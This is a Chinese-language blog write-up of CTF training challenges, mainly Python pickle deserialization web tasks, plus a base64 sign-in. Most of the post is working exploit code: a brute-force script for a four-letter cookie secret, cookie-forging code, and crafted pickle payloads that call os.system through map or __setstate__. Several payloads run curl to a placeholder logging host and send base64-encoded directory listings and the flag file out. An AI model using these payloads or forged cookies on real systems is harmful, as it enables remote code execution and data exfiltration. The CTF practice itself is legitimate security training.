HITCTF TRAIN 做题记录

训练一波

MISC

签到

打开源代码,观察到flag=ZmxhZ3t3ZTFjMG1lX3QwX0xpbGFjX0NURl9UMzRtfQo=

那么直接base64 decode得到flag

flag{we1c0me_t0_Lilac_CTF_T34m}

2019-11-03-WEB

2018-HITB-Python’s-Revenge

先观察app.py

发现cookie_secret只有四位字母

爆破一下得到密码ctfd

爆破脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import pickle 
import os
import string
from hashlib import sha256
import operator
import base64

asciis = string.ascii_letters + string.digits

sha = "b8ea3fb625c03dcaaa38615144b83944b23061a6fdba2e580f312a5f9504e597"

flag = 1

for a in asciis:
if flag == 0:
break
for b in asciis:
if flag == 0:
break
for c in asciis:
if flag == 0:
break
for d in asciis:
leak = "VnJlbQpwMAou".encode('utf-8')
lyvs = sha256(leak+(a+b+c+d).encode('utf-8')).hexdigest()
if lyvs == sha:
print(a+b+c+d)
flag = 0
break

那么我们来签一下名就行了

观察得到最多执行四个函数,还用黑名单屏蔽了几乎所有能用的函数

上网搜到map可以绕过

那么我们进行构造

注意:一定要在Linux下面运行,不然结果会something wrong,这个坑了我好半天,最后拿pickletools才看出来

查看目录

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
def __reduce__(self):
return map,(os.system,["curl -L {your_web_log_website}`ls -a / | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location.decode())

def calc_digest(location, secret):
return hashlib.sha256("%s%s" % (location, secret)).hexdigest()

aa = Test()
payload = base64.b64encode(pickletools.optimize(pickle.dumps(aa)))
print make_cookie(payload,secret)

发现了flag

那么我们cat一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
import pickle
import base64
import os
import hashlib
import pickletools

class Test(object):
def __init__(self):
self.a = 1
self.b = '2'
self.c = '3'
def __reduce__(self):
return map,(os.system,["curl -L {your_web_log_website}`cat /flag | base64`"])

secret = "ctfd"

def make_cookie(location, secret):
return "%s!%s" % (calc_digest(location, secret), location.decode())

def calc_digest(location, secret):
return hashlib.sha256("%s%s" % (location, secret)).hexdigest()

aa = Test()
payload = base64.b64encode(pickletools.optimize(pickle.dumps(aa)))
print make_cookie(payload,secret)

2019-SJTU-Pickle

在坤坤的帮助下

我学会了pickle

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import base64
import pickle
import os
import favorite

class Animal:
def __init__(self, name, category):
self.name = name
self.category = category

def __repr__(self):
return f'Animal(name={self.name!r}, category={self.category!r})'

def __eq__(self, other):
return True
def __reduce__(self):
return (Animal,(favorite.name,favorite.category))

fas = favorite.Animal(favorite.name, favorite.category)
fu = b'\x80\x03c__main__\nAnimal\nq\x00)\x81q\x01}q\x02(X\x04\x00\x00\x00nameq\x03cfavorite\nname\nq\x04X\x08\x00\x00\x00categoryq\x05cfavorite\ncategory\nq\x06ub.'

print(base64.b64encode(fu).decode())

2019-SJTU-Pickle-Revenge

观察和前一个pickle的区别,发现这玩意限制了模块只能由__main__启动,不能从别的模块那里弄到

那么根据奇妙的知识,我们就明白了可以利用一些巧妙的方式进行改写

直接上脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nfavorite\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub0c__main__\nAnimal\n)\x81}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

p = pickletools.optimize(payload)

last = "gANjX19tYWluX18KQW5pbWFsCnEAKYFxAX1xAihYBAAAAG5hbWVxA1gFAAAAa2l0dHlxBFgIAAAAY2F0ZWdvcnlxBVgDAAAAY2F0cQZ1Yi4="

print(base64.b64decode(last))

word = pickletools.optimize(base64.b64decode(last))

pickletools.dis(word)

pickletools.dis(p)

print(base64.b64encode(payload).decode())

2019-SJTU-Pickle-Revenge-Back

这个题需要一些RCE的技巧

URL

先获得目录

1
2
3
4
5
6
7
8
9
10
import os
import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`ls / |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

print(base64.b64encode(payload).decode())

再拿到flag

1
2
3
4
5
6
7
8
9
10
import os
import pickle
import pickletools
import base64

payload = b"\x80\x03c__main__\nAnimal\n)\x81}(V__setstate__\ncos\nsystem\nubVcurl -L {your_web_log_website}`cat /f11111111l4444gggg |base64`\nb0c__main__\nAnimal\n}q\x02(X\x04\x00\x00\x00nameq\x03X\x05\x00\x00\x00kittyq\x04X\x08\x00\x00\x00categoryq\x05X\x03\x00\x00\x00catq\x06ub."

pickletools.dis(payload)

print(base64.b64encode(payload).decode())

HITCTF TRAIN 做题记录
http://hexo.init-new-world.com/hitctf-train
Author
John Doe
Posted on
October 27, 2019
Licensed under